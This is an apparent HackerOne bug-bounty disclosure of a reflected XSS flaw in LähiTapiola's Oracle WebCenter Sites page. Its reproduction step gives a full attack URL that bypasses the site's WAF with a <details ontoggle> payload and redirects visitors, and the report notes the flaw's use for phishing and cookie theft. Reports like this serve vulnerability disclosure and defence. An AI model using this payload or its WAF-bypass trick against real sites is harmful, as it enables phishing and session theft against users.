LocalTapiola: Reflected XSS Vulnerability in https://www.lahitapiola.fi/cs/Satellite

ID H1:301680
Type hackerone
Reporter teemuk
Modified 2018-04-11T06:34:46


Basic report information

Summary: Reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite.

Description: There exists a reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav. Value of query string parameter rendermode is not properly escaped when it is output to the page. The web-application-firewall (WAF) seems to mitigate majority of the simplest XSS vectors, but it is possible to bypass the WAF by using onToggle event in <details> HTML element. The javascript that is used to demonstrate the vulnerability is location.href="https://www.google.com/?q="+document.domain. This demonstrates an open redirect type of vulnerability where user's browser is redirected to the attacker page where the attacker can e.g. perform phishing.

Domain: www.lahitapiola.fi

Browsers / Apps Verified In:

  • Firefox version 57.0.3

Steps To Reproduce:

Access the attack URL https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav&rendermode=preview"><details%20open=true%20ontoggle=%27location.href="https://www.google.com/?q="%2Bdocument.domain%27><summary>testing</summary></details> Browser is redirected to https://www.google.com/?q=www.lahitapiola.fi.

Additional material

  • N/A

Related reports, best practices

This vulnerability is related to the previously reported Oracle Webcenter Sites vulnerabilities (e.g. #170532)


An attacker can use reflected XSS vulnerabilities to inject content to pages served from www.lahitapiola.fi. This can be used e.g. for phishing purposes or to e.g. steal cookies from user's browser.